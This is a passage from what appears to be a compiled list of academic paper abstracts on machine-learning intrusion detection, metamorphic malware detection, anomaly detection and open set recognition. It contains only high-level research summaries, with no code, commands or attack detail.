part of a research program aimed at building computer security systems that incorporate the mechanisms and algorithms used by natural immune systems. --- paper_title: Modeling malicious activities in cyber space paper_content: Cyber attacks are an unfortunate part of society as an increasing amount of critical infrastructure is managed and controlled via the Internet. In order to protect legitimate users, it is critical for us to obtain an accurate and timely understanding of our cyber opponents. However, at the moment we lack effective tools to do this. In this article we summarize the work on modeling malicious activities from various perspectives, discuss the pros and cons of current models, and present promising directions for possible efforts in the near future. --- paper_title: Anomaly detection using call stack information paper_content: The call stack of a program execution can be a very good information source for intrusion detection. There is no prior work on dynamically extracting information from the call stack and effectively using it to detect exploits. In this paper we propose a new method to do anomaly detection using call stack information. The basic idea is to extract return addresses from the call stack, and generate an abstract execution path between two program execution points. Experiments show that our method can detect some attacks that cannot be detected by other approaches, while its convergence and false positive performance is comparable to or better than the other approaches. We compare our method with other approaches by analyzing their underlying principles and thus achieve a better characterization of their performance, in particular on what and why attacks will be missed by the various approaches. --- paper_title: Visual correlation of host processes and network traffic paper_content: Anomalous communication patterns are one of the leading indicators of computer system intrusions according to the system administrators we have interviewed. But a major problem is being able to correlate across the host/network boundary to see how network connections are related to running processes on a host. This paper introduces Portall, a visualization tool that gives system administrators a view of the communicating processes on the monitored machine correlated with the network activity in which the processes participate. Portall is a prototype of part of the Network Eye framework we have introduced in an earlier paper (Ball, et al., 2004). We discuss the Portall visualization, the supporting infrastructure it requires, and a formative usability study we conducted to obtain administrators' reactions to the tool. --- paper_title: Exploiting Execution Context for the Detection of Anomalous System Calls paper_content: Attacks against privileged applications can be detected by analyzing the stream of system calls issued during process execution. In the last few years, several approaches have been proposed to detect anomalous system calls. These approaches are mostly based on modeling acceptable system call sequences. Unfortunately, the techniques proposed so far are either vulnerable to certain evasion attacks or are too expensive to be practical. This paper presents a novel approach to the analysis of system calls that uses a composition of dynamic analysis and learning techniques to characterize anomalous system call invocations in terms of both the invocation context and the parameters passed to the system calls. Our technique provides a more precise detection model with respect to solutions proposed previously, and, in addition, it is able to detect data modification attacks, which cannot be detected using only system call sequence analysis. --- paper_title: Intrusion Detection Using Sequences of System Calls paper_content: A method is introduced for detecting intrusions at the level of privileged processes. Evidence is given that short sequences of system calls executed by running processes are a good discriminator between normal and abnormal operating characteristics of several common UNIX programs. Normal behavior is collected in two waysc Synthetically, by exercising as many normal modes of usage of a program as possible, and in a live user environment by tracing the actual execution of the program. In the former case several types of intrusive behavior were studieds in the latter case, results were analyzed for false positives. --- paper_title: Fool Me If You Can: Mimicking Attacks and Anti-Attacks in Cyberspace paper_content: Botnets have become major engines for malicious activities in cyberspace nowadays. To sustain their botnets and disguise their malicious actions, botnet owners are mimicking legitimate cyber behavior to fly under the radar. This poses a critical challenge in anomaly detection. In this paper, we use web browsing on popular web sites as an example to tackle this problem. First of all, we establish a semi-Markov model for browsing behavior. Based on this model, we find that it is impossible to detect mimicking attacks based on statistics if the number of active bots of the attacking botnet is sufficiently large (no less than the number of active legitimate users). However, we also find it is hard for botnet owners to satisfy the condition to carry out a mimicking attack most of the time. With this new finding, we conclude that mimicking attacks can be discriminated from genuine flash crowds using second order statistical metrics. We define a new fine correntropy metrics and show its effectiveness compared to others. Our real world data set experiments and simulations confirm our theoretical claims. Furthermore, the findings can be widely applied to similar situations in other research fields. --- paper_title: A Fast Automaton-Based Method for Detecting Anomalous Program Behaviors paper_content: Anomaly detection on system call sequences has become perhaps the most successful approach for detecting novel intrusions. A natural way for learning sequences is to use a finite-state automaton (FSA). However previous research indicates that FSA-learning is computationally expensive, that it cannot be completely automated or that the space usage of the FSA may be excessive. We present a new approach that overcomes these difficulties. Our approach builds a compact FSA in a fully automatic and efficient manner, without requiring access to source code for programs. The space requirements for the FSA is low - of the order of a few kilobytes for typical programs. The FSA uses only a constant time per system call during the learning as well as the detection period. This factor leads to low overheads for intrusion detection. Unlike many of the previous techniques, our FSA-technique can capture both short term and long term temporal relationships among system calls, and thus perform more accurate detection. This enables our approach to generalize and predict future behaviors from past behaviors. As a result, the training periods needed for our FSA based approach are shorter. Moreover false positives are reduced without increasing the likelihood of missing attacks. This paper describes our FSA based technique and presents a comprehensive experimental evaluation of the technique. --- paper_title: Metamorphic worm that carries its own morphing engine paper_content: Metamorphic malware changes its internal structure across generations, but its functionality remains unchanged. Well-designed metamorphic malware will evade signature detection. Recent research has revealed techniques based on hidden Markov models (HMMs) for detecting many types of metamorphic malware, as well as techniques for evading such detection. A worm is a type of malware that actively spreads across a network to other host systems. In this project we design and implement a prototype metamorphic worm that carries its own morphing engine. This is challenging, since the morphing engine itself must be morphed across replications, which imposes restrictions on the structure of the worm. Our design employs previously developed techniques to evade detection. We provide test results to confirm that this worm effectively evades signature and HMM-based detection, and we consider possible detection strategies. This worm provides a concrete example that should prove useful for additional metamorphic detection research. --- paper_title: Opcode graph similarity and metamorphic detection paper_content: In this paper, we consider a method for computing the similarity of executable files, based on opcode graphs. We apply this technique to the challenging problem of metamorphic malware detection and compare the results to previous work based on hidden Markov models. In addition, we analyze the effect of various morphing techniques on the success of our proposed opcode graph-based detection scheme. --- paper_title: Hunting for metamorphic engines paper_content: In this paper, we analyze several metamorphic virus generators. We define a similarity index and use it to precisely quantify the degree of metamorphism that each generator produces. Then we present a detector based on hidden Markov models and we consider a simpler detection method based on our similarity index. Both of these techniques detect all of the metamorphic viruses in our test set with extremely high accuracy. In addition, we show that popular commercial virus scanners do not detect the highly metamorphic virus variants in our test set. --- paper_title: Profile hidden Markov models and metamorphic virus detection paper_content: Metamorphic computer viruses “mutate” by changing their internal structure and, consequently, different instances of the same virus may not exhibit a common signature. With the advent of construction kits, it is easy to generate metamorphic strains of a given virus. In contrast to standard hidden Markov models (HMMs), profile hidden Markov models (PHMMs) explicitly account for positional information. In principle, this positional information could yield stronger models for virus detection. However, there are many practical difficulties that arise when using PHMMs, as compared to standard HMMs. PHMMs are widely used in bioinformatics. For example, PHMMs are the most effective tool yet developed for finding family related DNA sequences. In this paper, we consider the utility of PHMMs for detecting metamorphic virus variants generated from virus construction kits. PHMMs are generated for each construction kit under consideration and the resulting models are used to score virus and non-virus files. Our results are encouraging, but several problems must be resolved for the technique to be truly practical. --- paper_title: CODE OBFUSCATION AND VIRUS DETECTION paper_content: Typically, computer viruses and other malware are detected by searching for a string of bits which is found in the virus or malware. Such a string can be viewed as a “fingerprint” of the virus. These “fingerprints” are not generally unique; however they can be used to make rapid malware scanning feasible. This fingerprint is often called a signature and the technique of detecting viruses using signatures is known as signaturebased detection [8]. Today, virus writers often camouflage their viruses by using code obfuscation techniques in an effort to defeat signature-based detection schemes. So-called metamorphic viruses are viruses in which each instance has the same functionality but differs in its internal structure. Metamorphic viruses differ from polymorphic viruses in the method they use to hide their signature. While polymorphic viruses primarily rely on encryption for signature obfuscation, metamorphic viruses hide their signature via “mutating” their own code [3]. The paper [1] provides a rigorous proof that metamorphic viruses can bypass any signature-based detection, provided the code obfuscation has been done carefully based on a set of specified rules. Specifically, according to [1], if dead code is added and the control flow is changed sufficiently by inserting jump statements, the virus cannot be detected. In this project we first developed a code obfuscation engine conforming to the rules in [1]. We then used this engine to create metamorphic variants of a seed virus (created using the PS-MPK virus creation kit [15]) and demonstrated the validity of the assertion --- paper_title: Unsupervised learning techniques for an intrusion detection system paper_content: With the continuous evolution of the types of attacks against computer networks, traditional intrusion detection systems, based on pattern matching and static signatures, are increasingly limited by their need of an up-to-date and comprehensive knowledge base. Data mining techniques have been successfully applied in host-based intrusion detection. Applying data mining techniques on raw network data, however, is made difficult by the sheer size of the input; this is usually avoided by discarding the network packet contents.In this paper, we introduce a two-tier architecture to overcome this problem: the first tier is an unsupervised clustering algorithm which reduces the network packets payload to a tractable size. The second tier is a traditional anomaly detection algorithm, whose efficiency is improved by the availability of data on the packet payload content. --- paper_title: Toward Open Set Recognition paper_content: To date, almost all experimental evaluations of machine learning-based recognition algorithms in computer vision have taken the form of “closed set” recognition, whereby all testing classes are known at training time. A more realistic scenario for vision applications is “open set” recognition, where incomplete knowledge of the world is present at training time, and unknown classes can be submitted to an algorithm during testing. This paper explores the nature of open set recognition and formalizes its definition as a constrained minimization problem. The open set recognition problem is not well addressed by existing algorithms because it requires strong generalization. As a step toward a solution, we introduce a novel “1-vs-set machine,” which sculpts a decision space from the marginal distances of a 1-class or binary SVM with a linear kernel. This methodology applies to several different applications in computer vision where open set recognition is a challenging problem, including object recognition and face verification. We consider both in this work, with large scale cross-dataset experiments performed over the Caltech 256 and ImageNet sets, as well as face matching experiments performed over the Labeled Faces in the Wild set. The experiments highlight the effectiveness of machines adapted for open set evaluation compared to existing 1-class and binary SVMs for the same tasks. --- paper_title: Classification and Novel Class Detection in Concept-Drifting Data Streams under Time Constraints paper_content: Most existing data stream classification techniques ignore one important aspect of stream data: arrival of a novel class. We address this issue and propose a data stream classification technique that integrates a novel class detection mechanism into traditional classifiers, enabling automatic detection of novel classes before the true labels of the novel class instances arrive. Novel class detection problem becomes more challenging in the presence of concept-drift, when the underlying data distributions evolve in streams. In order to determine whether an instance belongs to a novel class, the classification model sometimes needs to wait for more test instances to discover similarities among those instances. A maximum allowable wait time Tc is imposed as a time constraint to classify a test instance. Furthermore, most existing stream classification approaches assume that the true label of a data point can be accessed immediately after the data point is classified. In reality, a time delay Tl is involved in obtaining the true label of a data point since manual labeling is time consuming. We show how to make fast and correct classification decisions under these constraints and apply them to real benchmark data. Comparison with state-of-the-art stream classification techniques prove the superiority of our approach. --- paper_title: Data Mining Approaches for Intrusion Detection paper_content: In this paper we discuss our research in developing general and systematic methods for intrusion detection. The key ideas are to use data mining techniques to discover consistent and useful patterns of system features that describe program and user behavior, and use the set of relevant system features to compute (inductively learned) classifiers that can recognize anomalies and known intrusions. Using experiments on the sendmail system call data and the network tcpdump data, we demonstrate that we can construct concise and accurate classifiers to detect anomalies. We provide an overview on two general data mining algorithms that we have implemented: the association rules algorithm and the frequent episodes algorithm. These algorithms can be used to compute the intra-and inter-audit record patterns, which are essential in describing program or user behavior. The discovered patterns can guide the audit data gathering process and facilitate feature selection. To meet the challenges of both efficient learning (mining) and real-time detection, we propose an agent-based architecture for intrusion detection systems where the learning agents continuously compute and provide the updated (detection) models to the detection agents. --- paper_title: Decision tree classifier for network intrusion detection with GA-based feature selection paper_content: Machine Learning techniques such as Genetic Algorithms and Decision Trees have been applied to the field of intrusion detection for more than a decade. Machine Learning techniques can learn normal and anomalous patterns from training data and generate classifiers that then are used to detect attacks on computer systems. In general, the input data to classifiers is in a high dimension feature space, but not all of features are relevant to the classes to be classified. In this paper, we use a genetic algorithm to select a subset of input features for decision tree classifiers, with a goal of increasing the detection rate and decreasing the false alarm rate in network intrusion detection. We used the KDDCUP 99 data set to train and test the decision tree classifiers. The experiments show that the resulting decision trees can have better performance than those built with all available features. --- paper_title: Data Streams: Models and Algorithms paper_content: This book primarily discusses issues related to the mining aspects of data streams and it is unique in its primary focus on the subject. This volume covers mining aspects of data streams comprehensively: each contributed chapter contains a survey on the topic, the key ideas in the field for that particular topic, and future research directions. The book is intended for a professional audience composed of researchers and practitioners in industry. This book is also appropriate for advanced-level students in computer science. --- paper_title: Automatic network intrusion detection: Current techniques and open issues paper_content: Automatic network intrusion detection has been an important research topic for the last 20years. In that time, approaches based on signatures describing intrusive behavior have become the de-facto industry standard. Alternatively, other novel techniques have been used for improving automation of the intrusion detection process. In this regard, statistical methods, machine learning and data mining techniques have been proposed arguing higher automation capabilities than signature-based approaches. However, the majority of these novel techniques have never been deployed on real-life scenarios. The fact is that signature-based still is the most widely used strategy for automatic intrusion detection. In the present article we survey the most relevant works in the field of automatic network intrusion detection. In contrast to previous surveys, our analysis considers several features required for truly deploying each one of the reviewed approaches. This wider perspective can help us to identify the possible causes behind the lack of acceptance of novel techniques by network security experts. --- paper_title: Feature engineering and classifier ensemble for KDD Cup 2010 paper_content: KDD Cup 2010 is an educational data mining competition. Participants are asked to learn a model from students' past behavior and then predict their future performance. At National Taiwan University, we organized a course for this competition. Most student sub-teams expanded features by various binarization and discretization techniques. The resulting sparse feature sets were trained by logistic regression (using LIBLINEAR). One sub-team considered condensed features using simple statistical techniques and applied Random Forest (through Weka) for training. Initial development was conducted on an internal split of training data for training and validation. We identied some useful feature combinations to improve performance. For the nal submission, we combined results of student sub-teams by regularized linear regression. Our team is the rst prize winner of both tracks (all teams and student teams) of KDD Cup 2010. --- paper_title: Improving Effectiveness of Intrusion Detection by Correlation Feature Selection paper_content: In this paper, the authors propose a new feature selection procedure for intrusion detection, which is based on filter method used in machine learning. They focus on Correlation Feature Selection CFS and transform the problem of feature selection by means of CFS measure into a mixed 0-1 linear programming problem with a number of constraints and variables that is linear in the number of full set features. The mixed 0-1 linear programming problem can then be solved by using branch-and-bound algorithm. This feature selection algorithm was compared experimentally with the best-first-CFS and the genetic-algorithm-CFS methods regarding the feature selection capabilities. Classification accuracies obtained after the feature selection by means of the C4.5 and the BayesNet over the KDD CUP'99 dataset were also tested. Experiments show that the authors' method outperforms the best-first-CFS and the genetic-algorithm-CFS methods by removing much more redundant features while keeping the classification accuracies or getting better performances. --- paper_title: Adaptive Multiagent System for Network Traffic Monitoring paper_content: Individual anomaly-detection methods for monitoring computer network traffic have relatively high error rates. An agent-based trust-modeling system fuses anomaly data and progressively improves classification to achieve acceptable error rates. --- paper_title: Intelligent agents for intrusion detection paper_content: The paper focuses on intrusion detection and countermeasures with respect to widely-used operating systems and networks. The design and architecture of an intrusion detection system built from distributed agents is proposed to implement an intelligent system on which data mining can be performed to provide global, temporal views of an entire networked system. A starting point for agent intelligence in the system is the research into the use of machine learning over system call traces from the privileged sendmail program on UNIX. The authors use a rule learning algorithm to classify the system call traces for intrusion detection purposes and show the results. --- paper_title: Intrusion detection using neural networks and support vector machines paper_content: Information security is an issue of serious global concern. The complexity, accessibility, and openness of the Internet have served to increase the security risk of information systems tremendously. This paper concerns intrusion detection. We describe approaches to intrusion detection using neural networks and support vector machines. The key ideas are to discover useful patterns or features that describe user behavior on a system, and use the set of relevant features to build classifiers that can recognize anomalies and known intrusions, hopefully in real time. Using a set of benchmark data from a KDD (knowledge discovery and data mining) competition designed by DARPA, we demonstrate that efficient and accurate classifiers can be built to detect intrusions. We compare the performance of neural networks based, and support vector machine based, systems for intrusion detection. --- paper_title: A comparative study of anomaly detection schemes in network intrusion detection paper_content: Intrusion detection corresponds to a suite of techniques that are used to identify attacks against computers and network infrastructures. Anomaly detection is a key element of intrusion detection in which perturbations of normal behavior suggest the presence of intentionally or unintentionally induced attacks, faults, defects, etc. This paper focuses on a detailed comparative study of several anomaly detection schemes for identifying different network intrusions. Several existing supervised and unsupervised anomaly detection schemes and their variations are evaluated on the DARPA 1998 data set of network connections [9] as well as on real network data using existing standard evaluation techniques as well as using several specific metrics that are appropriate when detecting attacks that involve a large number of connections. Our experimental results indicate that some anomaly detection schemes appear very promising when detecting novel intrusions in both DARPA’98 data and real network data. --- paper_title: FEATURE SELECTION FOR INTRUSION DETECTION WITH NEURAL NETWORKS AND SUPPORT VECTOR MACHINES paper_content: Computational intelligence (CI) methods are increasingly being used for problem solving, and CI-type learning machines are being used for intrusion detection. Intrusion detection is a problem of general interest to transportation infrastructure protection, since one of its necessary tasks is to protect the computers responsible for the infrastructure's operational control, and an effective intrusion detection system (IDS) is essential for ensuring network security. Two classes of learning machines for IDSs are studied: artificial neural networks (ANNs) and support vector machines (SVMs). SVMs are shown to be superior to ANNs in three critical respects of IDSs: SVMs train and run an order of magnitude faster; they scale much better; and they give higher classification accuracy. A related issue is ranking the importance of input features, which is itself a problem of great interest. Since elimination of the insignificant (or useless) inputs leads to a simplified problem and possibly faster and more accurate... --- paper_title: RT-UNNID: A practical solution to real-time network-based intrusion detection using unsupervised neural networks paper_content: With the growing rate of network attacks, intelligent methods for detecting new attacks have attracted increasing interest. The RT-UNNID system, introduced in this paper, is one such system, capable of intelligent real-time intrusion detection using unsupervised neural networks. Unsupervised neural nets can improve their analysis of new data over time without retraining. In previous work, we evaluated Adaptive Resonance Theory (ART) and Self-Organizing Map (SOM) neural networks using offline data. In this paper, we present a real-time solution using unsupervised neural nets to detect known and new attacks in network traffic. We evaluated our approach using 27 types of attack, and observed 97% precision using ART nets, and 95% precision using SOM nets. --- paper_title: Explaining and Harnessing Adversarial Examples paper_content: Several machine learning models, including neural networks, consistently misclassify adversarial examples---inputs formed by applying small but intentionally worst-case perturbations to examples from the dataset, such that the perturbed input results in the model outputting an incorrect answer with high confidence. Early attempts at explaining this phenomenon focused on nonlinearity and overfitting. We argue instead that the primary cause of neural networks' vulnerability to adversarial perturbation is their linear nature. This explanation is supported by new quantitative results while giving the first explanation of the most intriguing fact about them: their generalization across architectures and training sets. Moreover, this view yields a simple and fast method of generating adversarial examples. Using this approach to provide examples for adversarial training, we reduce the test set error of a maxout network on the MNIST dataset. --- paper_title: Network Intrusion Detection System Using Neural Networks paper_content: This paper presents a neural network-based intrusion detection method for the internet-based attacks on a computer network. Intrusion detection systems (IDS) have been created to predict and thwart current and future attacks. Neural networks are used to identify and predict unusual activities in the system. In particular, feedforward neural networks with the back propagation training algorithm were employed in this study. Training and testing data were obtained from the Defense Advanced Research Projects Agency (DARPA) intrusion detection evaluation data sets. The experimental results on real-data showed promising results on detection intrusion systems using neural networks. --- paper_title: Identifying important features for intrusion detection using support vector machines and neural networks paper_content: Intrusion detection is a critical component of secure information systems. This paper addresses the issue of identifying important input features in building an intrusion detection system (IDS). Since elimination of the insignificant and/or useless inputs leads to a simplification of the problem, faster and more accurate detection may result. Feature ranking and selection, therefore, is an important issue in intrusion detection. We apply the technique of deleting one feature at a time to perform experiments on SVMs and neural networks to rank the importance of input features for the DARPA collected intrusion data. Important features for each of the 5 classes of intrusion patterns in the DARPA data are identified. It is shown that SVM-based and neural network based IDSs using a reduced number of features can deliver enhanced or comparable performance. An IDS for class-specific detection based on five SVMs is proposed. --- paper_title: Deep neural networks are easily fooled: High confidence predictions for unrecognizable images paper_content: Deep neural networks (DNNs) have recently been achieving state-of-the-art performance on a variety of pattern-recognition tasks, most notably visual classification problems. Given that DNNs are now able to classify objects in images with near-human-level performance, questions naturally arise as to what differences remain between computer and human vision. A recent study [30] revealed that changing an image (e.g. of a lion) in a way imperceptible to humans can cause a DNN to label the image as something else entirely (e.g. mislabeling a lion a library). Here we show a related result: it is easy to produce images that are completely unrecognizable to humans, but that state-of-the-art DNNs believe to be recognizable objects with 99.99% confidence (e.g. labeling with certainty that white noise static is a lion). Specifically, we take convolutional neural networks trained to perform well on either the ImageNet or MNIST datasets and then find images with evolutionary algorithms or gradient ascent that DNNs label with high confidence as belonging to each dataset class. It is possible to produce images totally unrecognizable to human eyes that DNNs believe with near certainty are familiar objects, which we call “fooling images” (more generally, fooling examples). Our results shed light on interesting differences between human vision and current DNNs, and raise questions about the generality of DNN computer vision. --- paper_title: A new approach to intrusion detection using Artificial Neural Networks and fuzzy clustering paper_content: Many researches have argued that Artificial Neural Networks (ANNs) can improve the performance of intrusion detection systems (IDS) when compared with traditional methods. However for ANN-based IDS, detection precision, especially for low-frequent attacks, and detection stability are still needed to be enhanced. In this paper, we propose a new approach, called FC-ANN, based on ANN and fuzzy clustering, to solve the problem and help IDS achieve higher detection rate, less false positive rate and stronger stability. The general procedure of FC-ANN is as follows: firstly fuzzy clustering technique is used to generate different training subsets. Subsequently, based on different training subsets, different ANN models are trained to formulate different base models. Finally, a meta-learner, fuzzy aggregation module, is employed to aggregate these results. Experimental results on the KDD CUP 1999 dataset show that our proposed new approach, FC-ANN, outperforms BPNN and other well-known methods such as decision tree, the naive Bayes in terms of detection precision and detection stability. --- paper_title: A Self-organized Agent-based architecture for Power-aware Intrusion Detection in wireless ad-hoc networks paper_content: In this paper we propose SAPID-A Self-organized Agent-based architecture for Power-aware Intrusion Detection in wireless ad-hoc networks. We utilize an agent-based architecture that conserves the available bandwidth and segregates SAPID into two phases. Based on a power level metric and a hybrid metric that determine the duration and kinds of traffic that can be supported by a network-monitoring node, potential ad-hoc hosts are identified by repetitive training using an Adaptive Resonance Theory module. The agent architecture primarily consists of a Kohonen Self-Organizing Map to identify the appropriate patterns and recognize anomalies by way of unauthorized users in the network. A UNIX based session information file is utilized for testing and reporting possible intrusion attempts to the decision and action modules. Comprehensive experiments were carried out to clearly delineate and analyze the performance of the architecture. --- paper_title: Outside the Closed World: On Using Machine Learning for Network Intrusion Detection paper_content: In network intrusion detection research, one popular strategy for finding attacks is monitoring a network's activity for anomalies: deviations from profiles of normality previously learned from benign traffic, typically identified using tools borrowed from the machine learning community. However, despite extensive academic research one finds a striking gap in terms of actual deployments of such systems: compared with other intrusion detection approaches, machine learning is rarely employed in operational "real world" settings. We examine the differences between the network intrusion detection problem and other areas where machine learning regularly finds much more success. Our main claim is that the task of finding attacks is fundamentally different from these other applications, making it significantly harder for the intrusion detection community to employ machine learning effectively. We support this claim by identifying challenges particular to network intrusion detection, and provide a set of guidelines meant to strengthen future research on anomaly detection. --- paper_title: Bayesian Networks and Decision Graphs paper_content: Probabilistic graphical models and decision graphs are powerful modeling tools for reasoning and decision making under uncertainty. As modeling languages they allow a natural specification of problem domains with inherent uncertainty, and from a computational perspective they support efficient algorithms for automatic construction and query answering. This includes belief updating, finding the most probable explanation for the observed evidence, detecting conflicts in the evidence entered into the network, determining optimal strategies, analyzing for relevance, and performing sensitivity analysis. The book introduces probabilistic graphical models and decision graphs, including Bayesian networks and influence diagrams. The reader is introduced to the two types of frameworks through examples and exercises, which also instruct the reader on how to build these models. The book is a new edition of Bayesian Networks and Decision Graphs by Finn V. Jensen. The new edition is structured into two parts. The first part focuses on probabilistic graphical models. Compared with the previous book, the new edition also includes a thorough description of recent extensions to the Bayesian network modeling language, advances in exact and approximate belief updating algorithms, and methods for learning both the structure and the parameters of a Bayesian network. The second part deals with decision graphs, and in addition to the frameworks described in the previous edition, it also introduces Markov decision processes and partially ordered decision problems. The authors also provide a well-founded practical introduction to Bayesian networks, object-oriented Bayesian networks, decision trees, influence diagrams (and variants hereof), and Markov decision processes. give practical advice on the construction of Bayesian networks, decision trees, and influence diagrams from domain knowledge. give several examples and exercises exploiting computer systems for dealing with Bayesian networks and decision graphs. present a thorough introduction to state-of-the-art solution and analysis algorithms. The book is intended as a textbook, but it can also be used for self-study and as a reference book. --- paper_title: Intrusion detection using neural networks and support vector machines paper_content: Information security is an issue of serious global concern. The complexity, accessibility, and openness of the Internet have served to increase the security risk of information systems tremendously. This paper concerns intrusion detection. We describe approaches to intrusion detection using neural networks and support vector machines. The key ideas are to discover useful patterns or features that describe user behavior on a system, and use the set of relevant features to build classifiers that can recognize anomalies and known intrusions, hopefully in real time. Using a set of benchmark data from a KDD (knowledge discovery and data mining) competition designed by DARPA, we demonstrate that efficient and accurate classifiers can be built to detect intrusions. We compare the performance of neural networks based, and support vector machine based, systems for intrusion detection. --- paper_title: Letters: A hierarchical intrusion detection model based on the PCA neural networks paper_content: Most of existing intrusion detection (ID) models with a single-level structure can only detect either misuse or anomaly attacks. A hierarchical ID model using principal component analysis (PCA) neural networks is proposed to overcome such shortages. In the proposed model, PCA is applied for classification and neural networks are used for online computing. Experimental results and comparative studies based on the 1998 DARPA evaluation data sets are given, which show the proposed model can classify the network connections with satisfying performance. --- paper_title: Extreme Value Distributions: Theory and Applications paper_content: Univariate extreme value distributions generalized extreme value distributions multivariate extreme value distributions. --- paper_title: Improving one-class SVM for anomaly detection paper_content: With the tremendous growth of the Internet, information system security has become an issue of serious global concern due to the rapid connection and accessibility. Developing effective methods for intrusion detection, therefore, is an urgent task for assuring computer & information system security. Since most attacks and misuses can be recognized through the examination of system audit log files and pattern analysis therein, an approach for intrusion detection can be built on them. First we have made deep analysis on attacks and misuses patterns in log files; and then proposed an approach using support vector machines for anomaly detection. It is a one-class SVM based approach, trained with abstracted user audit logs data from 1999 DARPA. --- paper_title: Anomaly Intrusion Detection Using Incremental Learning of an Infinite Mixture Model with Feature Selection paper_content: We propose an incremental nonparametric Bayesian approach for clustering. Our approach is based on a Dirichlet process mixture of generalized Dirichlet GD distributions. Unlike classic clustering approaches, our model does not require the number of clusters to be pre-defined. Moreover, an unsupervised feature selection scheme is integrated into the proposed nonparametric framework to improve clustering performance. By learning the proposed model using an incremental variational framework, the number of clusters as well as the features weights can be automatically and simultaneously computed. The effectiveness and merits of the proposed approach are investigated on a challenging application namely anomaly intrusion detection. --- paper_title: Host-Based Intrusion Detection Using Dynamic and Static Behavioral Models paper_content: Intrusion detection has emerged as an important approach to network security. In this paper, we adopt an anomaly detection approach by detecting possible intrusions based on program or user profiles built from normal usage data. In particular, program profiles based on Unix system calls and user profiles based on Unix shell commands are modeled using two different types of behavioral models for data mining. The dynamic modeling approach is based on hidden Markov models (HMM) and the principle of maximum likelihood, while the static modeling approach is based on event occurrence frequency distributions and the principle of minimum cross entropy. The novelty detection approach is adopted to estimate the model parameters using normal training data only, as opposed to the classification approach which has to use both normal and intrusion data for training. To determine whether or not a certain behavior is similar enough to the normal model and hence should be classified as normal, we use a scheme that can be justified from the perspective of hypothesis testing. Our experimental results show that the dynamic modeling approach is better than the static modeling approach for the system call datasets, while the dynamic modeling approach is worse for the shell command datasets. Moreover, the static modeling approach is similar in performance to instance-based learning reported previously by others for the same shell command database but with much higher computational and storage requirements than our method. --- paper_title: Anomaly intrusion detection using one class SVM paper_content: Kernel methods are widely used in statistical learning for many fields, such as protein classification and image processing. We recently extend kernel methods to intrusion detection domain by introducing a new family of kernels suitable for intrusion detection. These kernels, combined with an unsupervised learning method - one-class support vector machine, are used for anomaly detection. Our experiments show that the new anomaly detection methods are able to achieve better accuracy rates than the conventional anomaly detectors. --- paper_title: Enhancing one-class support vector machines for unsupervised anomaly detection paper_content: Support Vector Machines (SVMs) have been one of the most successful machine learning techniques for the past decade. For anomaly detection, also a semi-supervised variant, the one-class SVM, exists. Here, only normal data is required for training before anomalies can be detected. In theory, the one-class SVM could also be used in an unsupervised anomaly detection setup, where no prior training is conducted. Unfortunately, it turns out that a one-class SVM is sensitive to outliers in the data. In this work, we apply two modifications in order to make one-class SVMs more suitable for unsupervised anomaly detection: Robust one-class SVMs and eta one-class SVMs. The key idea of both modifications is, that outliers should contribute less to the decision boundary as normal instances. Experiments performed on datasets from UCI machine learning repository show that our modifications are very promising: Comparing with other standard unsupervised anomaly detection algorithms, the enhanced one-class SVMs are superior on two out of four datasets. In particular, the proposed eta one-class SVM has shown the most promising results. --- paper_title: Toward Open Set Recognition paper_content: To date, almost all experimental evaluations of machine learning-based recognition algorithms in computer vision have taken the form of “closed set” recognition, whereby all testing classes are known at training time. A more realistic scenario for vision applications is “open set” recognition, where incomplete knowledge of the world is present at training time, and unknown classes can be submitted to an algorithm during testing. This paper explores the nature of open set recognition and formalizes its definition as a constrained minimization problem. The open set recognition problem is not well addressed by existing algorithms because it requires strong generalization. As a step toward a solution, we introduce a novel “1-vs-set machine,” which sculpts a decision space from the marginal distances of a 1-class or binary SVM with a linear kernel. This methodology applies to several different applications in computer vision where open set recognition is a challenging problem, including object recognition and face verification. We consider both in this work, with large scale cross-dataset experiments performed over the Caltech 256 and ImageNet sets, as well as face matching experiments performed over the Labeled Faces in the Wild set. The experiments highlight the effectiveness of machines adapted for open set evaluation compared to existing 1-class and binary SVMs for the same tasks. --- paper_title: Multi-class Open Set Recognition Using Probability of Inclusion paper_content: The perceived success of recent visual recognition approaches has largely been derived from their performance on classification tasks, where all possible classes are known at training time. But what about open set problems, where unknown classes appear at test time? Intuitively, if we could accurately model just the positive data for any known class without overfitting, we could reject the large set of unknown classes even under an assumption of incomplete class knowledge. In this paper, we formulate the problem as one of modeling positive training data at the decision boundary, where we can invoke the statistical extreme value theory. A new algorithm called the P I -SVM is introduced for estimating the unnormalized posterior probability of class inclusion. --- paper_title: On-Line Unsupervised Outlier Detection Using Finite Mixtures with Discounting Learning Algorithms paper_content: Outlier detection is a fundamental issue in data mining, specifically in fraud detection, network intrusion detection, network monitoring, etc. SmartSifter is an outlier detection engine addressing this problem from the viewpoint of statistical learning theory. This paper provides a theoretical basis for SmartSifter and empirically demonstrates its effectiveness. SmartSifter detects outliers in an on-line process through the on-line unsupervised learning of a probabilistic model (using a finite mixture model) of the information source. Each time a datum is input SmartSifter employs an on-line discounting learning algorithm to learn the probabilistic model. A score is given to the datum based on the learned model with a high score indicating a high possibility of being a statistical outlier. The novel features of SmartSifter are: (1) it is adaptive to non-stationary sources of datas (2) a score has a clear statistical/information-theoretic meanings (3) it is computationally inexpensives and (4) it can handle both categorical and continuous variables. An experimental application to network intrusion detection shows that SmartSifter was able to identify data with high scores that corresponded to attacks, with low computational costs. Further experimental application has identified a number of meaningful rare cases in actual health insurance pathology data from Australia's Health Insurance Commission. --- paper_title: Traffic classification and verification using unsupervised learning of Gaussian Mixture Models paper_content: This paper presents the use of unsupervised Gaussian Mixture Models (GMMs) for the production of per-application models using their flows' statistics in order to be exploited in two different scenarios: (i) traffic classification, where the goal is to classify traffic flows by application (ii) traffic verification or traffic anomaly detection, where the aim is to confirm whether or not traffic flow generated by the claimed application conforms to its expected model. Unlike the first scenario, the second one is a new research path that has received less attention in the scope of Intrusion Detection System (IDS) research. The term “unsupervised” refers to the method ability to select the optimal number of components automatically without the need of careful initialization. Experiments are carried out using a public dataset collected from a real network. Favorable results indicate the effectiveness of unsupervised GMMs. --- paper_title: Probability Models for Open Set Recognition paper_content: Real-world tasks in computer vision often touch upon open set recognition: multi-class recognition with incomplete knowledge of the world and many unknown inputs. Recent work on this problem has proposed a model incorporating an open space risk term to account for the space beyond the reasonable support of known classes. This paper extends the general idea of open space risk limiting classification to accommodate non-linear classifiers in a multi-class setting. We introduce a new open set recognition model called compact abating probability (CAP), where the probability of class membership decreases in value (abates) as points move from known data toward open space. We show that CAP models improve open set recognition for multiple algorithms. Leveraging the CAP 